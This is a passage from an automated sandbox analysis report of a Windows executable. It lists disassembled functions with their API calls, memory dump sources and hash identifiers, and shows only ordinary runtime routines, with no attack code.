                                                                                                                        • Opcode ID: 270654e7f32af84c117f9fe0717dd72637fdf532725a19c3835cfb3b55a83e0f
                                                                                                                        • Instruction ID: 33bc47f0b981cf8af0452464576420be5a6e7399a6aeaf95dd99c62acb724c3b
                                                                                                                        • Opcode Fuzzy Hash: 270654e7f32af84c117f9fe0717dd72637fdf532725a19c3835cfb3b55a83e0f
                                                                                                                        • Instruction Fuzzy Hash: D6B012C1A581007D310861182E03E3F014DC1CBF14330702FF408F86C0EC802D010431
                                                                                                                        Function 00E99F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00E9D343,00000001,?,?,?,00000000,00EA551D,?,?,?), ref: 00E99F9E
                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00EA551D,?,?,?,?,?,00EA4FC7,?), ref: 00E99FE5
                                                                                                                        • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00E9D343,00000001,?,?), ref: 00E9A011
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite$Handle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4209713984-0
                                                                                                                        • Opcode ID: ee86806df69989505392a96887e6b4eb9bf855dd8de3f51251fde413f6eedfe8
                                                                                                                        • Instruction ID: d6cedd3cbbf6a899df8db4e4b413aed14ad9167be9bfee7df36554696a82d49c
                                                                                                                        • Opcode Fuzzy Hash: ee86806df69989505392a96887e6b4eb9bf855dd8de3f51251fde413f6eedfe8
                                                                                                                        • Instruction Fuzzy Hash: 18318F31204305AFDF14CF24D818BBAB7A5EF84715F08552DF985BB290C775AD49CBA2
                                                                                                                        Function 00E9A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E9C27E: _wcslen.LIBCMT ref: 00E9C284
                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A2D9
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A30C
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A329
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2260680371-0
                                                                                                                        • Opcode ID: b219614113ba35d5a0c364093011c9a80257d5c8148684c77fe952e0c8e6b9d9
                                                                                                                        • Instruction ID: bc51f969ed6d10b1e3163e0d742e38d1dcaffbc3d10949e42c05a7676493f392
                                                                                                                        • Opcode Fuzzy Hash: b219614113ba35d5a0c364093011c9a80257d5c8148684c77fe952e0c8e6b9d9
                                                                                                                        • Instruction Fuzzy Hash: B301B132600210AAEF21EB758C0ABED32889F0A788F1C5438F901F6191DB64DA81C6F2
                                                                                                                        Function 00EBB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00EBB8B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Info
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1807457897-3916222277
                                                                                                                        • Opcode ID: 2512c1556027b8de854c732a85de9035a06e21a63d19a84664535fb9dc190c54
                                                                                                                        • Instruction ID: f505c034800f0f5a624bada306792a7f0947068250840c78811d54600c480150
                                                                                                                        • Opcode Fuzzy Hash: 2512c1556027b8de854c732a85de9035a06e21a63d19a84664535fb9dc190c54
                                                                                                                        • Instruction Fuzzy Hash: 7041197090424C9EDF228E24CC84BF7BBF9DB45308F1414EDE6DAA6142D375AA45CF60
                                                                                                                        Function 00EBAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00EBAFDD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String
                                                                                                                        • String ID: LCMapStringEx
                                                                                                                        • API String ID: 2568140703-3893581201
                                                                                                                        • Opcode ID: 01b6b015a3361daa2adc456a882fa7e949da66f580fa7b69443bb9318bcb736a
                                                                                                                        • Instruction ID: ff6bd5f65d7cf4a9f54fcd1f4fd26949ea7712b9aebaa244f304b6039524bee3
                                                                                                                        • Opcode Fuzzy Hash: 01b6b015a3361daa2adc456a882fa7e949da66f580fa7b69443bb9318bcb736a
                                                                                                                        • Instruction Fuzzy Hash: 9901E932604209BBCF125F91DD05DEE7FA2EF49754F055165FE1475160C6338932AF91
                                                                                                                        Function 00EBAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00EBA56F), ref: 00EBAF55
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountCriticalInitializeSectionSpin
                                                                                                                        • String ID: InitializeCriticalSectionEx
                                                                                                                        • API String ID: 2593887523-3084827643
                                                                                                                        • Opcode ID: 5dd742fd5b3bef67176ba356ffa0e2894559c256e83d430c898e5ac8e649396c
                                                                                                                        • Instruction ID: 49d84ee22b16fed465a563af5589c99c3009eb4bcb96db4b360c5eb237950fbb
                                                                                                                        • Opcode Fuzzy Hash: 5dd742fd5b3bef67176ba356ffa0e2894559c256e83d430c898e5ac8e649396c
                                                                                                                        • Instruction Fuzzy Hash: CCF0E931645208BFCF125F62CC02DEEBFA1EF48B21B055079FC487A260DA335E229B95
                                                                                                                        Function 00EBADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Alloc
                                                                                                                        • String ID: FlsAlloc
                                                                                                                        • API String ID: 2773662609-671089009
                                                                                                                        • Opcode ID: b0044ab6f3e692317590e35ff20525ae9ebd1301eff81fae202a5bcd1fed0916
                                                                                                                        • Instruction ID: 8e36bf7ef1749827300366916999494ea140ba83a189bd26a8d8b707797c9b86
                                                                                                                        • Opcode Fuzzy Hash: b0044ab6f3e692317590e35ff20525ae9ebd1301eff81fae202a5bcd1fed0916
                                                                                                                        • Instruction Fuzzy Hash: 6AE055306413087FCA01AB66DC02EAEBB90CB48B20B0620BDFC00B7340CD325E428ADA
                                                                                                                        Function 00EAE1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 9a0e52dafd32fd3ee8fbfb1065ad651de4ea1bd7138c2374ff6f575645cd8899
                                                                                                                        • Instruction ID: 2f74dadb453e635796a0e06b87f98140cc38cb9d6b804d77fee94a8e50cec540
                                                                                                                        • Opcode Fuzzy Hash: 9a0e52dafd32fd3ee8fbfb1065ad651de4ea1bd7138c2374ff6f575645cd8899
                                                                                                                        • Instruction Fuzzy Hash: B6B012D525E204AC310851591D83D37014CC5CAB10330703EF809F8281D8447C010531
                                                                                                                        Function 00EAE1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 81b293a56d1b179424bde8aefabf25428ef3475bb49162069bc4823ccf9795d4
                                                                                                                        • Instruction ID: 0dff0c42bf26defb951fffdce372344940730d867ef59722117998c5d4f16121
                                                                                                                        • Opcode Fuzzy Hash: 81b293a56d1b179424bde8aefabf25428ef3475bb49162069bc4823ccf9795d4
                                                                                                                        • Instruction Fuzzy Hash: CBB012D225A100AC314852151D43D37014CC5CBB10330F13EFC0DF8380D844BC050431
                                                                                                                        Function 00EAE1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 756640fc973930bb525cf80627df39c51336c3426a5cd220ab01901a95b4047b
                                                                                                                        • Instruction ID: 6da7dc3db5dc395204f034bf1623cc1412166c0b9de80f6ffe0a35a9f369713d
                                                                                                                        • Opcode Fuzzy Hash: 756640fc973930bb525cf80627df39c51336c3426a5cd220ab01901a95b4047b
                                                                                                                        • Instruction Fuzzy Hash: AEB012D525A200BC310811551D83C37010CC5CBB10330B43EFC05F8581D844BC010431
                                                                                                                        Function 00EAEAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAEAF9
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: 3Oo
                                                                                                                        • API String ID: 1269201914-2812179900
                                                                                                                        • Opcode ID: ae4237de9f6834963a82c3e7db2cebd0c58a6ac695a4681bc6e43e83d2215d5d
                                                                                                                        • Instruction ID: 17f8a531fbf772bf288d664979cbb35f861b24e7deec91c4cb092f30ab7c1852
                                                                                                                        • Opcode Fuzzy Hash: ae4237de9f6834963a82c3e7db2cebd0c58a6ac695a4681bc6e43e83d2215d5d
                                                                                                                        • Instruction Fuzzy Hash: 60B012C639A1427C310C62141F03C37414CC1C6F90330B12FF504FC181DC812C020431
                                                                                                                        Function 00EAE282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 040e208b532a9f639dfffb380a5eec99c1c422516b056f8f1886bdcb37167c4d
                                                                                                                        • Instruction ID: bada9c692b7420afb8e33c0c97f69fc9622cca7c81007b2a289a55450f2b8a7c
                                                                                                                        • Opcode Fuzzy Hash: 040e208b532a9f639dfffb380a5eec99c1c422516b056f8f1886bdcb37167c4d
                                                                                                                        • Instruction Fuzzy Hash: FDB012E125A100AC310851151E43D3701CCC5CAB10330703EF809F8280DC45BD020431
                                                                                                                        Function 00EAE26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 6a1bbf94101e91887cfae837566761143e208b70adaa3499d4ca9d822f7d419d
                                                                                                                        • Instruction ID: 3f41c8f8e8b840d9bd32f238ab9c2900f811fe9fca0f9121cde3937cec81c2be
                                                                                                                        • Opcode Fuzzy Hash: 6a1bbf94101e91887cfae837566761143e208b70adaa3499d4ca9d822f7d419d
                                                                                                                        • Instruction Fuzzy Hash: 8EB012D125A100AC310851251D43D37018CC5CBB10330B03EFD09F8280D844FC010431
                                                                                                                        Function 00EAE264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-3618818622
                                                                                                                        • Opcode ID: 4d66d393fe70aba3cf94ef20225fa44921ad71a14b9fe47b65cdbfa770db2d0a
                                                                                                                        • Instruction ID: 17073b01ad332db683945f2820020e06380c7933e1a5a656905113423f8bdd6f
                                                                                                                        • Opcode Fuzzy Hash: 4d66d393fe70aba3cf94ef20225fa44921ad71a14b9fe47b65cdbfa770db2d0a
                                                                                                                        • Instruction Fuzzy Hash: B4B012D136B140AC310851151D43D37018DC9CAB10330703EF80AF8280D8447C010431
                                                                                                                        Function 00EAE246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE1E3
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
